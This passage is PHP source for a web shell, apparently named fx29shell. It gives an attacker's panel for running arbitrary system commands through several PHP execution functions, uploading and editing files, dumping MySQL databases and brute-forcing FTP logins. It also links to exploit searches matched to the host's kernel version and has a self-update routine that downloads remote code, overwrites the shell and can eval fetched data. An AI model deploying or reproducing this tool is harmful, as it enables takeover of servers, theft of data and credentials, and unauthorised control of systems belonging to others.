<? echo htmlspecialchars(@$eval); ?>
	</textarea>
	<input type="hidden" name="d" value="<? echo $dispd; ?>"><br>
	<input type="submit" value="Execute"> Display in text-area <input type="checkbox" name="eval_txt" value="1"<? if(@$eval_txt){echo " checked";} ?>>
</form>
<? }if($act=="update"){$ret=fx29sh_getupdate(@$confirmupdate);echo "<b>$ret</b>";if(stristr($ret,"new version")){echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}if($act=="phpinfo"){@ob_clean();phpinfo();fx29shexit();}if($act=="tools"){fx29sh_tools();}if($act=="about"){fx29sh_about();}} ?>

</div>
<!-- End of Main Info -->

<!-- Commands Panel -->
<div id="main">

	<div class="bartitle"><b>.: COMMANDS PANEL :.</b></div>

<table id="mainpanel">
	<tr><th colspan="2">Command:</th>
	<td>
	<form name="f_cmd" method="post">
		<input type="hidden" name="act" value="cmd">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<input type="hidden" name="cmd_txt" value="1">
		<input type="text" name="cmd" size="100" value="<? echo @htmlspecialchars($cmd); ?>">
		<input type="submit" name="submit" value="Execute">
	</form>
	</td></tr>

	<tr><th colspan="2">Quick Commands:</th>
	<td>
	<form name="f_qcmd" method="post">
		<input type="hidden" name="act" value="cmd">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<input type="hidden" name="cmd_txt" value="1">
		<select name="cmd">
<? foreach($cmdaliases as $als){echo "\t\t\t";echo '<option value="'.htmlspecialchars($als[1 ]).'">'.htmlspecialchars($als[0 ]).'</option>';echo "\n";} ?>
		</select>
		<input type="submit" name="submit" value="Execute">
	</form>
	</td></tr>

	<tr><th colspan="2" rowspan="2">PHP Filesystem:</th>
	<td>
	<script language="javascript">
	function set_arg(txt1,txt2) {
	  document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
	  document.forms.fphpfsys.arg1.value = txt1;
	  document.forms.fphpfsys.arg2.value = txt2;
	}
	function chg_arg(num,txt1,txt2) {
	  if (num==0) {
	    document.forms.fphpfsys.arg1.type = "hidden";
	    document.forms.fphpfsys.A1.type = "hidden";
	  }
	  if (num<=1) {
	    document.forms.fphpfsys.arg2.type = "hidden";
	    document.forms.fphpfsys.A2.type = "hidden";
	  }
	  if (num==2) {
	    document.forms.fphpfsys.A1.type = "label";
	    document.forms.fphpfsys.A2.type = "label";
	    document.forms.fphpfsys.arg1.type = "text";
	    document.forms.fphpfsys.arg2.type = "text";
	  }
	  document.forms.fphpfsys.A1.value = txt1 + ":";
	  document.forms.fphpfsys.A2.value = txt2 + ":";
	}
	</script>
	<form name="fphpfsys" method="post">
		<input type="hidden" name="act" value="phpfsys">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<select name="phpfsysfunc">
<? foreach($phpfsaliases as $als){if($als[1 ]==@$phpfsysfunc){echo "\t\t<option selected value=\"".$als[1 ]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0 ]."</option>\n";}else {echo "\t\t<option value=\"".$als[1 ]."\" onclick=\"chg_arg('$als[2]','$als[3]','".@$als[4 ]."')\">".$als[0 ]."</option>\n";}} ?>
		</select>
		<input type="label" name="A1" value="File:" size=2 disabled>
		<input type=text name=arg1 size=40 value="<? echo @htmlspecialchars($arg1); ?>">
		<input type="hidden" name="A2" size=3 disabled >
		<input type="hidden" name="arg2" size=40 value="<? echo @htmlspecialchars($arg2); ?>">
		<input type="submit" name="submit" value="Execute">
	</form>
	</td></tr>
	<tr><td>
<? foreach($sh_sourcez as $e=>$o){echo "\t<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\n";} ?>
	</td></tr>

	<tr><th rowspan="4">Filesystem</th>
	<th>Search:</th>
	<td>
	<form name="f_search" method="post">
		<input type="hidden" name="act" value="search">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
	</form>
	</td></tr>
	<tr><th>Upload:</th>
	<td>
	<form name="f_upload" method="post" enctype="multipart/form-data">
		<input type="hidden" name="act" value="upload">
		<input type="file" name="uploadfile" size="50">
		<input type="submit" name="submit" value="Upload">
		<? echo "<small>Max size: ".@ini_get("upload_max_filesize")."B | Temp dir: ".@ini_get("upload_tmp_dir")."</small>\n"; ?>
	</form>
	</td></tr>
	<tr><th>Create:</th>
	<td>
	<form name="f_mkfile" method="post">
		<input type="hidden" name="act" value="mkfile">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<input type="hidden" name="ft" value="edit">
		<input type="text" name="mkfile" size="70" value="<? echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create">
	</form>
	</td></tr>
	<tr><th>View:</th><td>
	<form name="f_gofile" method="post">
		<input type="hidden" name="act" value="gofile">
		<input type="hidden" name="d" value="<? echo $dispd; ?>">
		<input type="text" name="f" size="70" value="<? echo $dispd; ?>"> <input type="submit" value="View">
	</form>
	</td></tr>
</table>

	<div class="bartitle footer"><? echo html_footer(); ?></div>

</div>
<!-- End of Commands Panel -->

</center></body>

</html>
<? function safemode(){if(@ini_get("safe_mode") or eregi("on",@ini_get("safe_mode"))){return TRUE;}else {return FALSE;}}function getdisfunc(){$disfunc=@ini_get("disable_functions");if(!empty($disfunc)){$disfunc=str_replace(" ","",$disfunc);$disfunc=explode(",",$disfunc);}else {$disfunc=array();}return $disfunc;}function enabled($func){if(function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())){return TRUE;}else {return FALSE;}}function fx29exec($cmd){$output="";if(enabled("popen")){$h=popen($cmd.' 2>&1','r');if(is_resource($h)){while(!feof($h)){$output.=fread($h,2096 );}pclose($h);}}elseif(enabled("passthru")){@ob_start();passthru($cmd);$output=@ob_get_contents();@ob_end_clean();}elseif(enabled("system")){@ob_start();system($cmd);$output=@ob_get_contents();@ob_end_clean();}elseif(enabled("exec")){exec($cmd,$o);$output=join("\r\n",$o);}elseif(enabled("shell_exec")){$output=shell_exec($cmd);}return $output;}function fx29exec2($cmd){$output="";if(enabled("shell_exec")){$output=shell_exec($cmd);}elseif(enabled("exec")){exec($cmd,$o);$output=join("\r\n",$o);}elseif(enabled("system")){@ob_start();system($cmd);$output=@ob_get_contents();@ob_end_clean();}elseif(enabled("passthru")){@ob_start();passthru($cmd);$output=@ob_get_contents();@ob_end_clean();}elseif(enabled("popen")){$h=popen($cmd.' 2>&1','r');if(is_resource($h)){while(!feof($h)){$output.=fread($h,2096 );}pclose($h);}}return $output;}function is_windows(){return strtolower(substr(PHP_OS,0 ,3 ))=="win";}function which($pr){$path=fx29exec("which $pr");if(!empty($path)){return $path;}else {return $pr;}}function get_status(){$arrfunc=array(array("MySQL","mysql_connect"),array("MSSQL","mssql_connect"),array("Oracle","ocilogon"),array("PostgreSQL","pg_connect"),array("Curl","curl_version"),);$arrcmd=array(array("Fetch","fetch --help"),array("Wget","wget --help"),array("Perl","perl -v"),);$statinfo=array();function showstat($sup,$stat){if($stat=="on"){return "$sup: <font class=on>ON</font>";}else {return "$sup: <font class=off>OFF</font>";}}foreach($arrfunc as $func){if(function_exists($func[1 ])){$statinfo[]=showstat($func[0 ],"on");}else {$statinfo[]=showstat($func[0 ],"off");}}$statinfo[]=(@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");foreach($arrcmd as $cmd){if(fx29exec2($cmd[1 ])){$statinfo[]=showstat($cmd[0 ],"on");}else {$statinfo[]=showstat($cmd[0 ],"off");}}return implode(" ",$statinfo);}function showdisfunc(){$disfunc=getdisfunc();if($disfunc=@ini_get("disable_functions")){return '<font class="off">'.$disfunc.'</font>';}else {return '<font class="on">NONE</font>';}}function disp_drives($curdir,$surl){$letters="";$v=explode("\\",$curdir);$v=$v[0 ];foreach(range("A","Z") as $letter){$bool=$isdiskette=$letter=="A";if(!$bool){$bool=is_dir($letter.":\\");}if($bool){$letters.="<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";if($letter.":"!=$v){$letters.=$letter;}else {$letters.="<font color=#3366FF>".$letter."</font>";}$letters.=" </a> ";}}if(!empty($letters)){return $letters;}else {return "None";}}function view_size($size){if(!is_numeric($size)){return FALSE;}else {if($size>=1073741824 ){$size=round($size/1073741824 *100 )/100 ." GB";}elseif($size>=1048576 ){$size=round($size/1048576 *100 )/100 ." MB";}elseif($size>=1024 ){$size=round($size/1024 *100 )/100 ." KB";}else {$size=$size." B";}return $size;}}function disp_freespace($curdrv){$free=@disk_free_space($curdrv);$total=@disk_total_space($curdrv);if($free===FALSE){$free=0 ;}if($total===FALSE){$total=0 ;}if($free<0 ){$free=0 ;}if($total<0 ){$total=0 ;}$used=$total-$free;$free_percent=round(100 /($total/$free),2 )."%";$free=view_size($free);$total=view_size($total);return "$free of $total ($free_percent)";}function fx29sh_getupdate($update=FALSE){global $fx29sh_updateurl;$url=$fx29sh_updateurl."?version=".urlencode(base64_encode(sh_ver));$data=@file_get_contents($url);if(!$data){return "<div class=errmsg>Can't connect to update-server! ($fx29sh_updateurl)</div>";}else {$data=ltrim($data);if($data{0 }=="\x99" and $data{1 }=="\x01"){return "You already using latest version!";}if($data{0 }=="\x99" and $data{1 }=="\x02"){$string=substr($data,3 ,ord($data{2 }));$string=explode("|",$string);if($update){$confvars=array();$sourceurl=$string[0 ];$source=@file_get_contents($sourceurl);if(!$source){return "Can't fetch update!";}else {$fp=@fopen(__FILE__,"w");if(!$fp){return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}else {fwrite($fp,$source);fclose($fp);return "Update completed!";}}}else {return "New version is available: ".$string[1 ];}}elseif($data{0 }=="\x99" and $data{1 }=="\x03"){eval($string);return TRUE;}else {return "<div class=errmsg>Error in protocol: segmentation failed! (".$data.")</div>";}}}function fx29_buff_prepare(){global $sess_data,$act;foreach($sess_data["copy"] as $k=>$v){$sess_data["copy"][$k]=str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}foreach($sess_data["cut"] as $k=>$v){$sess_data["cut"][$k]=str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}$sess_data["copy"]=array_unique($sess_data["copy"]);$sess_data["cut"]=array_unique($sess_data["cut"]);sort($sess_data["copy"]);sort($sess_data["cut"]);if($act!="copy"){foreach($sess_data["cut"] as $k=>$v){if($sess_data["copy"][$k]==$v){unset($sess_data["copy"][$k]);}}}else {foreach($sess_data["copy"] as $k=>$v){if($sess_data["cut"][$k]==$v){unset($sess_data["cut"][$k]);}}}}function fx29_sess_put($data){global $sess_cookie;global $sess_data;fx29_buff_prepare();$sess_data=$data;$data=serialize($data);setcookie($sess_cookie,$data);}function fs_copy_dir($d,$t){$d=str_replace("\\",DIRECTORY_SEPARATOR,$d);if(substr($d,-1 )!=DIRECTORY_SEPARATOR){$d.=DIRECTORY_SEPARATOR;}$h=opendir($d);while(($o=readdir($h))!==FALSE){if(($o!=".") and ($o!="..")){if(!is_dir($d.DIRECTORY_SEPARATOR.$o)){$ret=copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}else {$ret=mkdir($t.DIRECTORY_SEPARATOR.$o);fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}if(!$ret){return $ret;}}}closedir($h);return TRUE;}function fs_copy_obj($d,$t){$d=str_replace("\\",DIRECTORY_SEPARATOR,$d);$t=str_replace("\\",DIRECTORY_SEPARATOR,$t);if(!is_dir(dirname($t))){mkdir(dirname($t));}if(is_dir($d)){if(substr($d,-1 )!=DIRECTORY_SEPARATOR){$d.=DIRECTORY_SEPARATOR;}if(substr($t,-1 )!=DIRECTORY_SEPARATOR){$t.=DIRECTORY_SEPARATOR;}return fs_copy_dir($d,$t);}elseif(is_file($d)){return copy($d,$t);}else {return FALSE;}}function fs_move_dir($d,$t){$h=opendir($d);if(!is_dir($t)){mkdir($t);}while(($o=readdir($h))!==FALSE){if(($o!=".") and ($o!="..")){$ret=TRUE;if(!is_dir($d.DIRECTORY_SEPARATOR.$o)){$ret=copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}else {if(mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)){$ret=FALSE;}}if(!$ret){return $ret;}}}closedir($h);return TRUE;}function fs_move_obj($d,$t){$d=str_replace("\\",DIRECTORY_SEPARATOR,$d);$t=str_replace("\\",DIRECTORY_SEPARATOR,$t);if(is_dir($d)){if(substr($d,-1 )!=DIRECTORY_SEPARATOR){$d.=DIRECTORY_SEPARATOR;}if(substr($t,-1 )!=DIRECTORY_SEPARATOR){$t.=DIRECTORY_SEPARATOR;}return fs_move_dir($d,$t);}elseif(is_file($d)){if(copy($d,$t)){return unlink($d);}else {unlink($t);return FALSE;}}else {return FALSE;}}function fs_rmdir($d){$h=opendir($d);while(($o=readdir($h))!==FALSE){if(($o!=".") and ($o!="..")){if(!is_dir($d.$o)){unlink($d.$o);}else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR);rmdir($d.$o);}}}closedir($h);rmdir($d);return !is_dir($d);}function fs_rmobj($o){$o=str_replace("\\",DIRECTORY_SEPARATOR,$o);if(is_dir($o)){if(substr($o,-1 )!=DIRECTORY_SEPARATOR){$o.=DIRECTORY_SEPARATOR;}return fs_rmdir($o);}elseif(is_file($o)){return unlink($o);}else {return FALSE;}}function fx29shexit(){global $gzipencode,$ft;if(!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))){$v=@ob_get_contents();@ob_end_clean();@ob_start("ob_gzHandler");echo $v;@ob_end_flush();}exit;}function fx29fsearch($d){global $found,$found_d,$found_f,$search_i_f,$search_i_d,$a;if(substr($d,-1 )!=DIRECTORY_SEPARATOR){$d.=DIRECTORY_SEPARATOR;}$h=opendir($d);while(($f=readdir($h))!==FALSE){if($f!="." && $f!=".."){$bool=(empty($a["name_regexp"]) and strpos($f,$a["name"])!==FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));if(is_dir($d.$f)){$search_i_d++;if(empty($a["text"]) and $bool){$found[]=$d.$f;$found_d++;}if(!is_link($d.$f)){fx29fsearch($d.$f);}}else {$search_i_f++;if($bool){if(!empty($a["text"])){$r=@file_get_contents($d.$f);if($a["text_wwo"]){$a["text"]=" ".trim($a["text"])." ";}if(!$a["text_cs"]){$a["text"]=strtolower($a["text"]);$r=strtolower($r);}if($a["text_regexp"]){$bool=ereg($a["text"],$r);}else {$bool=strpos(" ".$r,$a["text"],1 );}if($a["text_not"]){$bool=!$bool;}if($bool){$found[]=$d.$f;$found_f++;}}else {$found[]=$d.$f;$found_f++;}}}}}closedir($h);}function tabsort($a,$b){global $v;return strnatcmp($a[$v],$b[$v]);}function view_perms_color($o){if(!is_readable($o)){return "<font class=red>".view_perms(fileperms($o))."</font>";}elseif(!is_writable($o)){return "<font color=white>".view_perms(fileperms($o))."</font>";}else {return "<font color=green>".view_perms(fileperms($o))."</font>";}}function view_perms($mode){if(($mode&0xc000 )===0xc000 ){$type="s";}elseif(($mode&0x4000 )===0x4000 ){$type="d";}elseif(($mode&0xa000 )===0xa000 ){$type="l";}elseif(($mode&0x8000 )===0x8000 ){$type="-";}elseif(($mode&0x6000 )===0x6000 ){$type="b";}elseif(($mode&0x2000 )===0x2000 ){$type="c";}elseif(($mode&0x1000 )===0x1000 ){$type="p";}else {$type="?";}$owner["read"]=($mode&00400 )?"r":"-";$owner["write"]=($mode&00200 )?"w":"-";$owner["execute"]=($mode&00100 )?"x":"-";$group["read"]=($mode&00040 )?"r":"-";$group["write"]=($mode&00020 )?"w":"-";$group["execute"]=($mode&00010 )?"x":"-";$world["read"]=($mode&00004 )?"r":"-";$world["write"]=($mode&00002 )?"w":"-";$world["execute"]=($mode&00001 )?"x":"-";if($mode&0x800 ){$owner["execute"]=($owner["execute"]=="x")?"s":"S";}if($mode&0x400 ){$group["execute"]=($group["execute"]=="x")?"s":"S";}if($mode&0x200 ){$world["execute"]=($world["execute"]=="x")?"t":"T";}return $type.join("",$owner).join("",$group).join("",$world);}function parsesort($sort){$one=intval($sort);$second=substr($sort,-1 );if($second!="d"){$second="a";}return array($one,$second);}function parse_perms($mode){if(($mode&0xc000 )===0xc000 )$t="s";elseif(($mode&0x4000 )===0x4000 )$t="d";elseif(($mode&0xa000 )===0xa000 )$t="l";elseif(($mode&0x8000 )===0x8000 )$t="-";elseif(($mode&0x6000 )===0x6000 )$t="b";elseif(($mode&0x2000 )===0x2000 )$t="c";elseif(($mode&0x1000 )===0x1000 )$t="p";else $t="?";$o["r"]=($mode&00400 )>0 ;$o["w"]=($mode&00200 )>0 ;$o["x"]=($mode&00100 )>0 ;$g["r"]=($mode&00040 )>0 ;$g["w"]=($mode&00020 )>0 ;$g["x"]=($mode&00010 )>0 ;$w["r"]=($mode&00004 )>0 ;$w["w"]=($mode&00002 )>0 ;$w["x"]=($mode&00001 )>0 ;return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);}function str2mini($content,$len){if(strlen($content)>$len){$len=ceil($len/2 )-2 ;return substr($content,0 ,$len)."...".substr($content,-$len);}else {return $content;}}function strips(&$arr,$k=""){if(is_array($arr)){foreach($arr as $k=>$v){if(strtoupper($k)!="GLOBALS")strips($arr["$k"]);}}else {$arr=stripslashes($arr);}}function getmicrotime(){list($usec,$sec)=explode(" ",microtime());return ((float)$usec+(float)$sec);}function milw0rm(){$Lversion=php_uname("r");$OSV=php_uname("s");if(eregi("Linux",$OSV)){$Lversion=substr($Lversion,0 ,6 );return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;}else {$Lversion=substr($Lversion,0 ,3 );return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;}}function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh){if($fqb_onlywithsh){$TRUE=(!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}else {$TRUE=TRUE;}if($TRUE){$sock=@ftp_connect($host,$port,$timeout);if(@ftp_login($sock,$login,$pass)){echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";@ob_flush();return TRUE;}}}function mysql_dump($set){$sock=$set["sock"];$db=$set["db"];$print=$set["print"];$nl2br=$set["nl2br"];$file=$set["file"];$add_drop=$set["add_drop"];$tabs=$set["tabs"];$onlytabs=$set["onlytabs"];$ret=array();$ret["err"]=array();if(!is_resource($sock)){echo ("Error: \$sock is not valid resource.");}if(empty($db)){$db="db";}if(empty($print)){$print=0 ;}if(empty($nl2br)){$nl2br=0 ;}if(empty($add_drop)){$add_drop=TRUE;}if(empty($file)){$file=$tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";}if(!is_array($tabs)){$tabs=array();}if(empty($add_drop)){$add_drop=TRUE;}if(sizeof($tabs)==0 ){$res=mysql_query("SHOW TABLES FROM ".$db,$sock);if(mysql_num_rows($res)>0 ){while($row=mysql_fetch_row($res)){$tabs[]=$row[0 ];}}}$out="
  # Dumped by ".sh_name()."
  # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  # Date: ".date("d.m.Y H:i:s")."
  # DB: \"".$db."\"
  #---------------------------------------------------------";$c=count($onlytabs);foreach($tabs as $tab){if((in_array($tab,$onlytabs)) or (!$c)){if($add_drop){$out.="DROP TABLE IF EXISTS `".$tab."`;\n";}$res=mysql_query("SHOW CREATE TABLE `".$tab."`",$sock);if(!$res){$ret["err"][]=mysql_smarterror();}else {$row=mysql_fetch_row($res);$out.=$row["1"].";\n\n";$res=mysql_query("SELECT * FROM `$tab`",$sock);if(mysql_num_rows($res)>0 ){while($row=mysql_fetch_assoc($res)){$keys=implode("`, `",array_keys($row));$values=array_values($row);foreach($values as $k=>$v){$values[$k]=addslashes($v);}$values=implode("', '",$values);$sql="INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";$out.=$sql;}}}}}$out.="#---------------------------------------------------------------------------------\n\n";if($file){$fp=fopen($file,"w");if(!$fp){$ret["err"][]=2 ;}else {fwrite($fp,$out);fclose($fp);}}if($print){if($nl2br){echo nl2br($out);}else {echo $out;}}return $out;}function mysql_buildwhere($array,$sep=" and",$functs=array()){if(!is_array($array)){$array=array();}$result="";foreach($array as $k=>$v){$value="";if(!empty($functs[$k])){$value.=$functs[$k]."(";}$value.="'".addslashes($v)."'";if(!empty($functs[$k])){$value.=")";}$result.="`".$k."` = ".$value.$sep;}$result=substr($result,0 ,strlen($result)-strlen($sep));return $result;}function mysql_fetch_all($query,$sock){if($sock){$result=mysql_query($query,$sock);}else {$result=mysql_query($query);}$array=array();while($row=mysql_fetch_array($result)){$array[]=$row;}mysql_free_result($result);return $array;}function mysql_smarterror($sock){if($sock){$error=mysql_error($sock);}else {$error=mysql_error();}$error=htmlspecialchars($error);return $error;}function mysql_query_form(){global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;if(($submit) and (!$sql_query_result) and ($sql_confirm)){if(!$sql_query_error){$sql_query_error="Query was empty";}echo "<b>Error:</b> <br>".$sql_query_error."<br>";}if($sql_query_result or (!$sql_confirm)){$sql_act=$sql_goto;}if((!$submit) or ($sql_act)){echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=\"post\"><b>";if(($sql_query) and (!$submit)){echo "Do you really want to";}else {echo "SQL-Query";}echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";if($tbl_struct){echo "<td valign=\"top\"><b>Fields:</b><br>";foreach($tbl_struct as $field){$name=$field["Field"];echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}echo "</td></tr></table>";}}if($sql_query_result or (!$sql_confirm)){$sql_query=$sql_last_query;}}function mysql_create_db($db,$sock=""){$sql="CREATE DATABASE `".addslashes($db)."`;";if($sock){return mysql_query($sql,$sock);}else {return mysql_query($sql);}}function mysql_query_parse($query){$query=trim($query);$arr=explode(" ",$query);$types=array("SELECT"=>array(3 ,1 ),"SHOW"=>array(2 ,1 ),"DELETE"=>array(1 ),"DROP"=>array(1 ));$result=array();$op=strtoupper($arr[0 ]);if(is_array($types[$op])){$result["propertions"]=$types[$op];$result["query"]=$query;if($types[$op]==2 ){foreach($arr as $k=>$v){if(strtoupper($v)=="LIMIT"){$result["limit"]=$arr[$k+1 ];$result["limit"]=explode(",",$result["limit"]);if(count($result["limit"])==1 ){$result["limit"]=array(0 ,$result["limit"][0 ]);}unset($arr[$k],$arr[$k+1 ]);}}}}else {return FALSE;}}function imagez(){$images=array("home"=>'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'.'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'.'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'.'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=',"buffer"=>'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'.'4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'.'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'.'NhsFiLq+NhEAOw==',"search"=>'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'.'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'.'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7',"back"=>'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'.'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'.'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'.'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==',"forward"=>'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'.'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'.'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'.'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=',"up"=>'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'.'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'.'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'.'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==',"help"=>'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'.'aLor7ixK8+qb0eqLN/mENVlfYJpDUEkPMaSh474xwbTvsA3AEN8CV6GgEhR6Dh5SEFA8BkeASgmQ'.'Aa4/igMQvXoLjoBXJ3AGu95rMQ0ua8Vpb5HKhWgJ8SsZfbVb8ypwaWRmRoACdHp2Wol5aTINW3Ep'.'fHtAgn1MbByRmnKIXw8FLE9fV0ScEkVhKSYrGAqrG02wEa6stbm6CQA7',"change"=>'R0lGODlhEAAQALMMADMuME2f58e2ON7OMsXZ88wpTd/t/FhYU4x9erCwrIWSpW54iwAAAAAAAAAA'.'AAAAACH5BAHoAwwALAAAAAAQABAAAARckMlJ6wQn6wMsW0QoBktXLUaaEkHAIYiJqiuhFAUg0yqR'.'IAKdZMYzIAacCbGXEAyEQ0IvlEAeKCCDVJpompRbkUJzEokBi0XZTFgoCFfKwa1Q0NNxCmazz3v+'.'DBEAOw==',"delete"=>'R0lGODlhEAAQAKIGAJIMJNMHLckjQURDQ2oqNigoKAAAAAAAACH5BAHoAwYALAAAAAAQABAAAANP'.'KDHW/k4JBiuRFI5pilBE8RQX12yBIHYfMGTeNxQoMVfbJ7gZ5AWpV8VBU6SGkVSpR7zwdISKURgz'.'dS4B2yMXMgyAWo2OBGQ6cq+NmbhJAAA7',"download"=>"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu"."EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=","setup"=>"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC"."QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA"."ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB"."qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE"."OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==","small_dir"=>'R0lGODlhDwAQALMPAAkJCXV3iEFvz5it4MXV8lFkqXaU2au+6EtMViQkJYGGq2JjcUFhunN3ljc3'.'OQAAACH5BAHoAw8ALAAAAAAPABAAAARuEKDVVEsv64wO+UfjOBO1AM2nHsbQGkaDDCo43EdOVPW